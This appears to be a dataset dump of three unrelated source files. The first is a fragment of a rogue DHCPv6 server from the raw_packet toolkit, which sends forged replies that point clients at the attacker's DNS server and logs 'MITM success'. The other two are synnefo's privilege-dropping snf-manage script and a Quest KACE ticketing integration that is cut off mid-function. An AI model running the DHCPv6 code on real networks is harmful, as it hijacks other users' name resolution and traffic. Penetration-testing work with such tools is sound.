packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']))
self._base.print_info('DHCPv6 Advertise to: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']),
' IAA: ', ipv6_address)
# Add client info in global self._clients dictionary
self._add_client_info_in_dictionary(client_mac_address,
{'dhcpv6 solicit': True,
'advertise address': ipv6_address},
client_already_in_dictionary)
# endregion
# region DHCPv6 Request
if packet['DHCPv6']['message-type'] == 3:
# Set DHCPv6 reply packet
dhcpv6_reply: Union[None, bytes] = None
# region Get Client DUID time, IPv6 address and Server MAC address
client_ipv6_address: Union[None, str] = None
server_mac_address: Union[None, str] = None
for dhcpv6_option in packet['DHCPv6']['options']:
if dhcpv6_option['type'] == 2:
server_mac_address = dhcpv6_option['value']['mac-address']
if dhcpv6_option['type'] == 3:
client_ipv6_address = dhcpv6_option['value']['ipv6-address']
# endregion
if server_mac_address is not None and client_ipv6_address is not None:
# Check Server MAC address
if server_mac_address != self._your['mac-address']:
self._add_client_info_in_dictionary(
client_mac_address,
{'dhcpv6 mitm': 'error: server mac address is not your mac address'},
client_already_in_dictionary)
else:
self._add_client_info_in_dictionary(
client_mac_address,
{'dhcpv6 mitm': 'success'},
client_already_in_dictionary)
try:
if client_ipv6_address == self._clients[client_mac_address]['advertise address']:
dhcpv6_reply = \
self._dhcpv6.make_reply_packet(ethernet_src_mac=self._your['mac-address'],
ethernet_dst_mac=packet['Ethernet']['source'],
ipv6_src=self._your['ipv6-link-address'],
ipv6_dst=packet['IPv6']['source-ip'],
transaction_id=packet['DHCPv6']['transaction-id'],
dns_address=self._dns_server_ipv6_address,
domain_search=self._domain_search,
ipv6_address=client_ipv6_address,
cid=cid)
self._raw_send.send_packet(dhcpv6_reply)
else:
self._add_client_info_in_dictionary(
client_mac_address,
{'dhcpv6 mitm': 'error: client request address is not advertise address'},
client_already_in_dictionary)
except KeyError:
self._add_client_info_in_dictionary(
client_mac_address,
{'dhcpv6 mitm': 'error: not found dhcpv6 solicit request for this client'},
client_already_in_dictionary)
# Print info messages
self._base.print_info('DHCPv6 Request from: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']),
' Server: ', server_mac_address,
' IAA: ', client_ipv6_address)
if dhcpv6_reply is not None:
self._base.print_info('DHCPv6 Reply to: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']),
' Server: ', server_mac_address,
' IAA: ', client_ipv6_address)
else:
if self._clients[client_mac_address]['dhcpv6 mitm'] == \
'error: server mac address is not your mac address':
self._base.print_error('Server MAC address in DHCPv6 Request is not your MAC address ' +
'for this client: ', client_mac_address)
if self._clients[client_mac_address]['dhcpv6 mitm'] == \
'error: client request address is not advertise address':
                            self._base.print_error('Client requested IPv6 address is not the advertised IPv6 address ' +
                                                   'for this client: ', client_mac_address)
if self._clients[client_mac_address]['dhcpv6 mitm'] == \
'error: not found dhcpv6 solicit request for this client':
                            self._base.print_error('Could not find DHCPv6 Solicit request ' +
                                                   'for this client: ', client_mac_address)
# endregion
# region DHCPv6 Release
if packet['DHCPv6']['message-type'] == 8:
# Print info message
self._base.print_info('DHCPv6 Release from: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']))
# Delete this client from global self._clients dictionary
try:
del self._clients[client_mac_address]
client_already_in_dictionary = False
except KeyError:
pass
# endregion
# region DHCPv6 Confirm
if packet['DHCPv6']['message-type'] == 4:
# region Get Client IPv6 address
client_ipv6_address: Union[None, str] = None
for dhcpv6_option in packet['DHCPv6']['options']:
if dhcpv6_option['type'] == 3:
client_ipv6_address = dhcpv6_option['value']['ipv6-address']
# endregion
# region Make and send DHCPv6 Reply packet
dhcpv6_reply = \
self._dhcpv6.make_reply_packet(ethernet_src_mac=self._your['mac-address'],
ethernet_dst_mac=packet['Ethernet']['source'],
ipv6_src=self._your['ipv6-link-address'],
ipv6_dst=packet['IPv6']['source-ip'],
transaction_id=packet['DHCPv6']['transaction-id'],
dns_address=self._dns_server_ipv6_address,
domain_search=self._domain_search,
ipv6_address=client_ipv6_address,
cid=cid)
self._raw_send.send_packet(dhcpv6_reply)
# endregion
# region Add Client info in global self._clients dictionary and print info message
self._add_client_info_in_dictionary(client_mac_address,
{'advertise address': client_ipv6_address,
'dhcpv6 mitm': 'success'},
client_already_in_dictionary)
self._base.print_info('DHCPv6 Confirm from: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']),
' IAA: ', client_ipv6_address)
self._base.print_info('DHCPv6 Reply to: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']),
' IAA: ', client_ipv6_address)
# endregion
# endregion
# endregion
# endregion
# region Check MiTM Success
def _check_mitm_status(self, client_mac_address: str):
try:
if not self._disable_dhcpv6:
assert self._clients[client_mac_address]['dhcpv6 mitm'] == 'success'
# assert self._clients[client_mac_address]['neighbor solicitation advertise address']
else:
if self._dns_server_ipv6_address != self._your['ipv6-link-address']:
if self._dns_server_ipv6_address.startswith(self._ipv6_prefix_address) or \
self._dns_server_ipv6_address.startswith('fe80::'):
assert self._clients[client_mac_address]['neighbor solicitation dns server address']
assert self._clients[client_mac_address]['neighbor solicitation your address']
assert self._clients[client_mac_address]['neighbor solicitation in ipv6 prefix']
assert 'success message' not in self._clients[client_mac_address].keys()
self._base.print_success('MITM success: ',
self._clients[client_mac_address]['advertise address'] +
' (' + client_mac_address + ')')
if self._exit_on_success:
sleep(3)
exit(0)
else:
self._clients[client_mac_address].update({'success message': True})
return True
except KeyError:
return False
except AssertionError:
return False
# endregion
# endregion
|
Vladimir-Ivanov-Git/raw-packet
|
raw_packet/Servers/dhcpv6_server.py
|
Python
|
mit
| 34,064
|
# Copyright (C) 2010-2017 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import errno
import grp
import pwd
from django.core.management import ManagementUtility
from django.core import management
from synnefo.util.version import get_component_version
from logging.config import dictConfig
# monkey patch to show synnefo version instead of django version
management.get_version = lambda: get_component_version('webproject')
class SynnefoManagementUtility(ManagementUtility):
def main_help_text(self):
return ManagementUtility.main_help_text(self, commands_only=True)
def configure_logging():
try:
from synnefo.settings import SNF_MANAGE_LOGGING_SETUP
dictConfig(SNF_MANAGE_LOGGING_SETUP)
except ImportError:
import logging
logging.basicConfig()
log = logging.getLogger()
log.warning("SNF_MANAGE_LOGGING_SETUP setting missing.")
def get_uid(user):
if isinstance(user, int):
return user
elif user.isdigit():
return int(user)
else:
try:
return pwd.getpwnam(user).pw_uid
except KeyError:
raise Exception("No such user: '%s'" % user)
def get_gid(group):
if isinstance(group, int):
return group
elif group.isdigit():
return int(group)
else:
try:
return grp.getgrnam(group).gr_gid
except KeyError:
raise Exception("No such group: '%s'" % group)
def set_uid_gid(uid, gid):
if gid:
os.setgid(gid)
if uid:
username = None
try:
username = pwd.getpwuid(uid)[0]
except KeyError:
pass
# also set supplementary groups for the user
if username is not None:
if not gid:
gid = os.getgid()
try:
os.initgroups(username, gid)
except OSError, e:
if e.errno != errno.EPERM:
raise
os.setuid(uid)
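# Note on the ordering in set_uid_gid above: the group id and supplementary groups
# are dropped before calling os.setuid(), because once the process gives up root via
# setuid() it can no longer change its group memberships.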
def set_user_group():
from synnefo import settings
snf_user = getattr(settings, "SNF_MANAGE_USER", None)
snf_group = getattr(settings, "SNF_MANAGE_GROUP", None)
if snf_user is None:
raise Exception("`SNF_MANAGE_USER` setting not defined")
if snf_group is None:
raise Exception("`SNF_MANAGE_GROUP` setting not defined")
snf_uid = get_uid(snf_user)
snf_gid = get_gid(snf_group)
cur_uid = os.geteuid()
cur_gid = os.getegid()
if cur_uid != 0 and (cur_uid != snf_uid or cur_gid != snf_gid):
        sys.stderr.write("snf-manage must be run as user root or as "
                         "`SNF_MANAGE_USER`:`SNF_MANAGE_GROUP` (%s:%s)\n" %
                         (str(snf_user), str(snf_group)))
if cur_uid == snf_uid:
return
set_uid_gid(snf_uid, snf_gid)
def main():
os.environ['DJANGO_SETTINGS_MODULE'] = \
os.environ.get('DJANGO_SETTINGS_MODULE', 'synnefo.settings')
set_user_group()
configure_logging()
mu = SynnefoManagementUtility(sys.argv)
mu.execute()
if __name__ == "__main__":
main()
|
grnet/synnefo
|
snf-webproject/synnefo/webproject/manage.py
|
Python
|
gpl-3.0
| 3,730
|
from typing import Dict, Optional, Tuple, Callable, Any, Union
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import json
import requests
import dateparser
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
# key = field of a ticket , val = dict of (name,id) of options
TICKETS_OBJECTS = {
'impact': {
'1 person cannot work': 1,
'Many people cannot work': 2,
'1 person inconvenienced': 3,
'Many people inconvenienced': 4
},
'category': {
"Network": 1,
"Other": 2,
"Software": 4,
"Hardware": 3
},
'priority': {
"Medium": 1,
'High': 2,
'Low': 3
},
'status': {
'Opened': 1,
'Closed': 2,
'Need More Info': 3,
'New': 4,
'Reopened': 5,
'Waiting Overdue': 6,
'Waiting on Customer': 7,
'Waiting on Third Party': 8
}
}
def convert_snake_to_camel(snake_str: str) -> str:
"""Convert a specific string of snake case to camel case.
Args:
snake_str: The string that we would like to convert.
Returns:
converted string.
"""
snake_split = snake_str.split("_")
camel_string = "".join(map(str.capitalize, snake_split))
camel_string = convert_specific_keys(camel_string)
return camel_string
def convert_specific_keys(string: str):
"""
Convert specific keys to demisto standard
Args:
string: the text to transform
Returns:
A Demisto output standard string
"""
if string == 'OsName':
return 'OSName'
if string == 'OsNumber':
return 'OSNumber'
if string == 'Ram total':
return 'RamTotal'
if string == 'AssetDataId':
return 'AssetDataID'
if string == 'AssetClassId':
return 'AssetClassID'
if string == 'AssetStatusId':
return 'AssetStatusID'
if string == 'AssetTypeId':
return 'AssetTypeID'
if string == 'MappedId':
return 'MappedID'
if string == 'OwnerId':
return 'OwnerID'
if string == 'HdQueueId':
return 'HdQueueID'
if string == 'Ip':
return 'IP'
return string
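# Examples of the mapping performed by the two helpers above (illustrative only):
#   convert_snake_to_camel('os_name')     -> 'OSName'
#   convert_snake_to_camel('hd_queue_id') -> 'HdQueueID'
#   convert_snake_to_camel('ram_used')    -> 'RamUsed'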
def convert_dict_snake_to_camel(dic: dict) -> dict:
"""Convert a dictionary of snake case to camel case.
Args:
dic: The dictionary that we would like to convert.
Returns:
converted dictionary.
"""
context_dict = {}
for snake_str in dic:
if type(dic[snake_str]) is dict:
inner_dict = convert_dict_snake_to_camel(dic[snake_str])
camel = convert_snake_to_camel(snake_str)
context_dict[camel] = inner_dict
elif type(dic[snake_str]) is list:
inner_dict = parse_response(dic[snake_str])
camel = convert_snake_to_camel(snake_str)
context_dict[camel] = inner_dict
elif snake_str in ['id', 'Id']:
context_dict['ID'] = dic.get(snake_str, '')
else:
camel = convert_snake_to_camel(snake_str)
context_dict[camel] = dic.get(snake_str, '')
return context_dict
def parse_response(lst: list):
"""Convert a Api response to wanted format.
Args:
        lst: A list of dictionaries returned from the API call.
Returns:
converted list of dictionaries from snake case to camel case.
"""
list_res = []
for dic in lst:
context_dict = convert_dict_snake_to_camel(dic)
list_res.append(context_dict)
return list_res
class Client(BaseClient):
"""
Client to use in the integration, overrides BaseClient.
Used for communication with the api.
"""
def __init__(self, url: str, username: str, password: str, verify: bool, proxy: bool):
super().__init__(base_url=f"{url}/api", verify=verify, proxy=proxy)
self._url = url
self._username = username
self._password = password
self._token, self._cookie = self.get_token()
def get_token(self) -> Tuple[str, str]:
"""Get a token for the connection.
Returns:
token , cookie for the connection.
"""
token = ''
cookie = ''
data = {
"userName": self._username,
"password": self._password
}
login_url = f"{self._url}/ams/shared/api/security/login"
body = json.dumps(data)
headers = {'Content-Type': 'application/json'}
response = self.token_request(login_url, headers=headers, data=body)
# Extracting Token
response_cookies = response.get('cookies').__dict__.get('_cookies')
if response_cookies:
cookie_key = list(response_cookies.keys())[0]
if cookie_key:
ret_cookie = response_cookies.get(cookie_key).get("/")
cookie = self.get_cookie(ret_cookie)
token = ret_cookie.get("KACE_CSRF_TOKEN").__dict__.get('value')
if not token:
raise DemistoException("Could not get token")
if not cookie:
raise DemistoException("Could not get cookie")
return token, cookie
def update_token(self):
"""Update cookie and token.
Returns:
Tuple of token and cookie.
"""
self._token, self._cookie = self.get_token()
def get_cookie(self, res_cookie: dict) -> str:
"""Get a cookie from an cookie object in the needed format for the requests.
Args:
res_cookie: part of the response that the cookie is inside it.
Returns:
string that will be sent in the requests which represents the cookie in the header.
"""
KACE_CSRF_TOKEN = res_cookie.get("KACE_CSRF_TOKEN").__dict__.get('value')
x_dell_auth_jwt = res_cookie.get("x-dell-auth-jwt").__dict__.get('value')
kboxid = res_cookie.get("kboxid").__dict__.get('value')
KACE_LAST_USER_SECURE = res_cookie.get("KACE_LAST_USER_SECURE").__dict__.get('value')
KACE_LAST_ORG_SECURE = res_cookie.get("KACE_LAST_ORG_SECURE").__dict__.get('value')
cookie = f'KACE_LAST_USER_SECURE={KACE_LAST_USER_SECURE}; KACE_LAST_ORG_SECURE={KACE_LAST_ORG_SECURE};' \
f' kboxid={kboxid}; x-dell-auth-jwt={x_dell_auth_jwt}; KACE_CSRF_TOKEN={KACE_CSRF_TOKEN}'
return cookie
def token_request(self, url: str, headers: Optional[dict] = None, data: Optional[str] = None) -> dict:
"""login request for initiating a connection with the product.
Args:
url: full url that the request will be sent to.
headers: headers of the request.
data: data of the request which includes username and password.
Returns:
Dictionary of the response from the product.
"""
try:
response = requests.request("POST", url, headers=headers, data=data, verify=self._verify)
except requests.exceptions.SSLError:
err_msg = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' checkbox in' \
' the integration configuration.'
raise DemistoException(err_msg)
except requests.exceptions.ConnectionError:
raise DemistoException("Invalid url , Failed to establish a connection")
if response.status_code == 401:
raise DemistoException("Error Code 401 - Invalid user or password")
return response.__dict__
def machines_list_request(self, filter_fields: Optional[str] = None):
"""List of machines.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie
}
url_suffix = '/inventory/machines'
if filter_fields:
url_suffix += f'?filtering={filter_fields}'
return self._http_request("GET", url_suffix=url_suffix, headers=headers)
def assets_list_request(self, filter_fields: Optional[str] = None) -> dict:
"""List of assets.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie
}
url_suffix = '/asset/assets'
if filter_fields:
url_suffix += f'?filtering={filter_fields}'
return self._http_request("GET", url_suffix=url_suffix, headers=headers)
def queues_list_request(self, filter_fields: Optional[str] = None) -> dict:
"""List of queues.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie
}
url_suffix = '/service_desk/queues?shaping=fields all'
if filter_fields:
url_suffix += f'&filtering={filter_fields}'
return self._http_request("GET", url_suffix=url_suffix, headers=headers)
def queues_list_fields_request(self, queue_number: str) -> dict:
"""List of fields in specific queue.
Args:
            queue_number: queue number for the request.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie
}
return self._http_request("GET", url_suffix=f"/service_desk/queues/{queue_number}/fields", headers=headers)
def tickets_list_request(self, shaping_fields: str = None, filter_fields: str = None) -> dict:
"""List of Tickets.
Args:
shaping_fields: str of the shaping that will be sent in the request.
filter_fields: str of filter that will be sent in the request.
Returns:
Response from API.
"""
if not shaping_fields:
shaping_fields = set_shaping(self)
self.update_token()
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie
}
url_suffix = f"/service_desk/tickets?shaping={shaping_fields}"
if filter_fields:
url_suffix += f'&filtering={filter_fields}'
return self._http_request("GET", url_suffix=url_suffix, headers=headers)
def create_ticket_request(self, data: str) -> dict:
"""Create Ticket
Args:
data (str): the body of the request.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie,
'Content-Type': 'application/json'
}
return self._http_request("POST", url_suffix="/service_desk/tickets", headers=headers, data=data)
def update_ticket_request(self, ticket_id: str, data: str) -> dict:
"""Update Ticket.
Args:
ticket_id (str): ticket id that will be updated.
data (str): the body of the request.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie,
'Content-Type': 'application/json'
}
return self._http_request("POST", url_suffix=f"/service_desk/tickets/{ticket_id}", headers=headers, data=data)
def delete_ticket_request(self, ticket_id: str) -> dict:
"""Delete Ticket.
Args:
ticket_id (str): ticket id that will be deleted.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie,
'Content-Type': 'application/json'
}
return self._http_request("DELETE", url_suffix=f"/service_desk/tickets/{ticket_id}", headers=headers)
def ticket_by_id_request(self, filtering_id: int) -> dict:
"""Specific ticket details by ID.
Args:
            filtering_id: the ticket id to filter by.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie
}
filter_fields = f"id eq {filtering_id}"
return self._http_request("GET", url_suffix=f"/service_desk/tickets?filtering={filter_fields}", headers=headers)
def test_module(client: Client, *_) -> Tuple[str, dict, dict]:
"""Function which checks if there is a connection with the api.
Args:
client : Integration client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
_ = client.machines_list_request()
client.update_token()
response = client.tickets_list_request()
list_tickets_res = response.get('Tickets')
if list_tickets_res and demisto.params().get('isFetch'):
parse_date_range(demisto.params().get('fetch_time'), date_format='%Y-%m-%dT%H:%M:%SZ')
parsed_time = (datetime.utcnow() - timedelta(days=20))
incidents, _ = parse_incidents(list_tickets_res, "1", '%Y-%m-%dT%H:%M:%SZ', parsed_time)
return 'ok', {}, {}
def get_machines_list_command(client, args) -> Tuple[str, dict, dict]:
"""Function which returns all machines in the system.
Args:
        client : Integration client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
limit = int(args.get('limit', 50))
filter_fields = args.get('custom_filter')
response = client.machines_list_request(filter_fields)
raw_response = response.get('Machines')[:limit]
context = parse_response(raw_response)
human_readable_markdown = tableToMarkdown('Quest Kace Machines', context, removeNull=True, headers=['ID', 'Name',
'IP', 'Created',
'Modified',
'LastInventory',
'LastSync',
'ManualEntry',
'PagefileMaxSize',
'PagefileSize',
'RamTotal',
'RamUsed'])
context = {
'QuestKace.Machine(val.ID === obj.ID)': context
}
return human_readable_markdown, context, raw_response
def get_assets_list_command(client, args) -> Tuple[str, dict, dict]:
"""Function which returns all assets in the system.
Args:
        client : Integration client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
limit = int(args.get('limit', 50))
filter_fields = args.get('custom_filter')
response = client.assets_list_request(filter_fields)
raw_response = response.get('Assets')[:limit]
context = parse_response(raw_response)
human_readable_markdown = tableToMarkdown('Quest Kace Assets', context, removeNull=True,
headers=['ID', 'Name', 'Created', 'Modified', 'OwnerID', 'MappedID',
'AssetClassID', 'AssetDataID', 'AssetStatusID', 'AssetTypeID',
'AssetTypeName'])
context = {
'QuestKace.Asset(val.ID === obj.ID)': context
}
return human_readable_markdown, context, raw_response
def get_queues_list_command(client, args) -> Tuple[str, dict, dict]:
"""Function which returns all queues in the system.
Args:
client : Integretion client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
filter_fields = args.get('custom_filter')
limit = int(args.get('limit', 50))
response = client.queues_list_request(filter_fields)
raw_response = response.get('Queues')[:limit]
context = parse_response(raw_response)
human_readable_markdown = tableToMarkdown('Quest Kace Queues', context, removeNull=True,
headers=['ID', 'Name', 'Fields'])
context = {
'QuestKace.Queue(val.ID === obj.ID)': context
}
return human_readable_markdown, context, raw_response
def get_tickets_list_command(client, args) -> Tuple[str, dict, dict]:
"""Function which returns all tickets in the system.
Args:
        client : Integration client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
limit = int(args.get('limit', 50))
custom_shaping = args.get("custom_shaping")
custom_filter = args.get("custom_filter")
response = client.tickets_list_request(custom_shaping, custom_filter)
raw_response = response.get('Tickets')[:limit]
context = parse_response(raw_response)
for response in context:
response['IsDeleted'] = False
human_readable_markdown = tableToMarkdown('Quest Kace Tickets', context, removeNull=True,
headers=['ID', 'Title', 'Created', 'Modified', 'HdQueueID', 'DueDate'])
context = {
'QuestKace.Ticket(val.ID === obj.ID)': context
}
return human_readable_markdown, context, raw_response
def create_ticket_command(client, args) -> Tuple[str, dict, dict]:
"""Function which creates a new ticket to the system according to users arguments.
Args:
        client : Integration client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
impact = None
category = None
status = None
priority = None
hd_queue_id = args.get('queue_id')
custom_fields = args.get('custom_fields')
if (custom_fields and "hd_queue_id" not in custom_fields) and (not hd_queue_id):
raise DemistoException("hd_queue_id is a mandatory value, please add it.")
title = args.get("title")
summary = args.get('summary')
if args.get('impact'):
dict_of_obj = TICKETS_OBJECTS.get('impact')
impact = args.get('impact')
if dict_of_obj:
impact = dict_of_obj.get(args.get('impact'), args.get('impact'))
    if args.get('category'):
        dict_of_obj = TICKETS_OBJECTS.get('category')
        category = args.get('category')
        if dict_of_obj:
            category = dict_of_obj.get(args.get('category'), args.get('category'))
    if args.get('status'):
        dict_of_obj = TICKETS_OBJECTS.get('status')
        status = args.get('status')
        if dict_of_obj:
            status = dict_of_obj.get(args.get('status'), args.get('status'))
    if args.get('priority'):
        dict_of_obj = TICKETS_OBJECTS.get('priority')
        priority = args.get('priority')
        if dict_of_obj:
            priority = dict_of_obj.get(args.get('priority'), args.get('priority'))
machine = args.get('machine')
asset = args.get('asset')
body_from_args = create_body_from_args(hd_queue_id, title, summary, impact, category, status, priority, machine,
asset)
if custom_fields:
splited = split_fields(custom_fields)
body_from_args.update(splited)
temp_data = {'Tickets': [body_from_args]}
data = json.dumps(temp_data)
response = client.create_ticket_request(data)
if response.get('Result') != 'Success':
raise DemistoException('Error while adding a new ticket.')
try:
id = response.get('IDs')[0]
except Exception as e:
raise DemistoException(e)
client.update_token()
res = client.ticket_by_id_request(id)
ticket = res.get('Tickets')
ticket_view = tableToMarkdown(f'New ticket was added successfully, ticket number {id}.\n', ticket)
return ticket_view, {}, {}
def create_body_from_args(hd_queue_id: Union[str, int] = None, title: Union[str, int] = None,
summary: Union[str, int] = None, impact: Union[str, int] = None,
category: Union[str, int] = None, status: Union[str, int] = None,
priority: Union[str, int] = None, machine: Union[str, int] = None,
asset: Union[str, int] = None) -> dict:
"""Function which creates the body of the request from user arguments.
Args:
hd_queue_id: the queue number to insert the ticket to.
title: title of the ticket.
summary: summary of the ticket.
impact: impact of the ticket.
category: category of the ticket.
status: status of the ticket.
priority: priority of the ticket.
machine: machine of the ticket.
asset: asset of the ticket.
Returns:
body of the request as a dict.
"""
body = {}
if hd_queue_id:
body.update({'hd_queue_id': hd_queue_id})
if title:
body.update({'title': title})
if summary:
body.update({'summary': summary})
if impact:
body.update({'impact': impact})
if category:
body.update({'category': category})
if status:
body.update({'status': status})
if priority:
body.update({'priority': priority})
if machine:
body.update({'machine': machine})
if asset:
body.update({'asset': asset})
return body
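# Illustrative sketch (hypothetical values): the body built above is wrapped in a
# 'Tickets' list and serialized before being sent, e.g.
#   create_body_from_args(hd_queue_id=1, title='Printer down', impact=2)
#   -> {'hd_queue_id': 1, 'title': 'Printer down', 'impact': 2}
# and the final payload is json.dumps({'Tickets': [body]}).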
def update_ticket_command(client, args) -> Tuple[str, dict, dict]:
"""Function which updates the body of the request from user arguments.
Args:
        client : Integration client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
impact = None
category = None
status = None
priority = None
ticket_id = args.get('ticket_id')
title = args.get("title")
summary = args.get('summary')
if args.get('impact'):
impact = TICKETS_OBJECTS['impact'][args.get('impact')]
if args.get('category'):
category = TICKETS_OBJECTS['category'][args.get('category')]
if args.get('status'):
status = TICKETS_OBJECTS['status'][args.get('status')]
if args.get('priority'):
priority = TICKETS_OBJECTS['priority'][args.get('priority')]
machine = args.get('machine')
asset = args.get('asset')
custom_fields = args.get('custom_fields')
body_from_args = create_body_from_args(title=title, summary=summary, impact=impact, category=category,
status=status,
priority=priority, machine=machine, asset=asset)
if custom_fields:
splited = split_fields(custom_fields)
body_from_args.update(splited)
temp_data = {'Tickets': [body_from_args]}
data = json.dumps(temp_data)
response = client.update_ticket_request(ticket_id, data)
if response.get('Result') != 'Success':
raise DemistoException('Error while updating the ticket.')
client.update_token()
res = client.ticket_by_id_request(ticket_id)
ticket = res.get('Tickets')
ticket_view = tableToMarkdown(f'Ticket number {ticket_id} was updated successfully.\n', ticket)
return ticket_view, {}, {}
def delete_ticket_command(client, args) -> Tuple[str, dict, dict]:
"""Function which deleted a specific ticket by ticket id.
Args:
        client : Integration client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
ticket_id = args.get('ticket_id')
try:
response = client.delete_ticket_request(ticket_id)
except Exception as e:
raise DemistoException(e)
if response.get('Result') == 'Success':
context = {}
old_context = demisto.dt(demisto.context(), f'QuestKace.Ticket(val.ID === {ticket_id})')
if old_context:
if isinstance(old_context, list):
old_context = old_context[0]
old_context['IsDeleted'] = True
context = {
'QuestKace.Ticket(val.ID === obj.ID)': old_context
}
return f'Ticket was deleted successfully. Ticket number {ticket_id}', context, {}
else:
raise DemistoException('Error while deleting the ticket.')
def fetch_incidents(client: Client, fetch_time: str, fetch_shaping: str, last_run: Dict, fetch_limit: str,
fetch_queue_id: Optional[list] = None, fetch_filter: Optional[str] = None) -> list:
"""
This function will execute each interval (default is 1 minute).
Args:
client (Client): Quest Kace Client
fetch_time: time interval for fetch incidents.
fetch_shaping: shaping for the request.
fetch_filter: custom filters for the request.
fetch_limit: limit for number of fetch incidents per fetch.
fetch_queue_id: queue id for fetch, if not given then fetch runs on all tickets in the system
last_run (dateparser.time): The greatest incident created_time we fetched from last fetch
Returns:
incidents: Incidents that will be created in Demisto
"""
if not fetch_queue_id or fetch_queue_id[0] == 'All':
fetch_queue_id = get_queue_ids(client)
time_format = '%Y-%m-%dT%H:%M:%SZ'
if not last_run: # if first time running
new_last_run = {'last_fetch': parse_date_range(fetch_time, date_format=time_format)[0]}
else:
new_last_run = last_run
if not fetch_shaping:
fetch_shaping = shaping_fetch(client, fetch_queue_id)
parsed_last_time = datetime.strptime(new_last_run.get('last_fetch', ''), time_format)
fetch_filter_for_query = f'created gt {parsed_last_time}'
if fetch_queue_id:
queue_id_str = ';'.join(fetch_queue_id)
filter_by_queue_id = f'hd_queue_id in {queue_id_str}'
fetch_filter_for_query = f'{fetch_filter_for_query},{filter_by_queue_id}'
if fetch_filter:
fetch_filter_for_query = f'{fetch_filter_for_query},{fetch_filter}'
demisto.info(f"Fetching Incident has Started,\n"
f"Fetch filter is {fetch_filter_for_query}\n"
f"Last fetch was on {str(parsed_last_time)}")
client.update_token()
items: dict = client.tickets_list_request(fetch_shaping, fetch_filter_for_query)
items: list = items.get('Tickets', [])
incidents, last_incident_time = parse_incidents(items, fetch_limit, time_format, parsed_last_time)
last_incident_time = last_incident_time.strftime(time_format)
demisto.info(f"Fetching Incident has Finished\n"
f"Fetch limit was {fetch_limit}"
f"Last fetch was on {str(last_incident_time)}\n"
f"Number of incidents was {len(incidents)}")
demisto.setLastRun({'last_fetch': last_incident_time})
return incidents
def shaping_fetch(client: Client, fetch_queue_id: list) -> str:
"""
    Create and update the shaping fields once a day and save them in the integration context.
Args:
client: Client for the api.
        fetch_queue_id: list of queue ids whose fields are used to build the shaping.
Returns:
the current shaping.
"""
integration_context = demisto.getIntegrationContext()
if integration_context:
valid_until = integration_context.get('valid_until')
time_now = int(time.time())
if time_now < valid_until:
fetch_shaping = integration_context.get('shaping_fields')
else:
fetch_shaping = set_shaping(client, fetch_queue_id)
integration_context = {
'shaping_fields': fetch_shaping,
'valid_until': int(time.time()) + 3600 * 24
}
demisto.setIntegrationContext(integration_context)
else:
fetch_shaping = set_shaping(client, fetch_queue_id)
integration_context = {
'shaping_fields': fetch_shaping,
'valid_until': int(time.time()) + 3600 * 24
}
demisto.setIntegrationContext(integration_context)
return fetch_shaping
def get_fields_by_queue(client, queue: Optional[list]) -> list:
"""
    Creating a list of all ticket field json keys for the given queues (or for all queues in the system).
    Args:
        client: Client for the api.
        queue: Optional list of queue ids to collect fields from.
    Returns:
        list of field json keys.
"""
if queue:
queues_id = queue
else:
queues_id = get_queue_ids(client)
fields: list = []
for q in queues_id:
client.update_token()
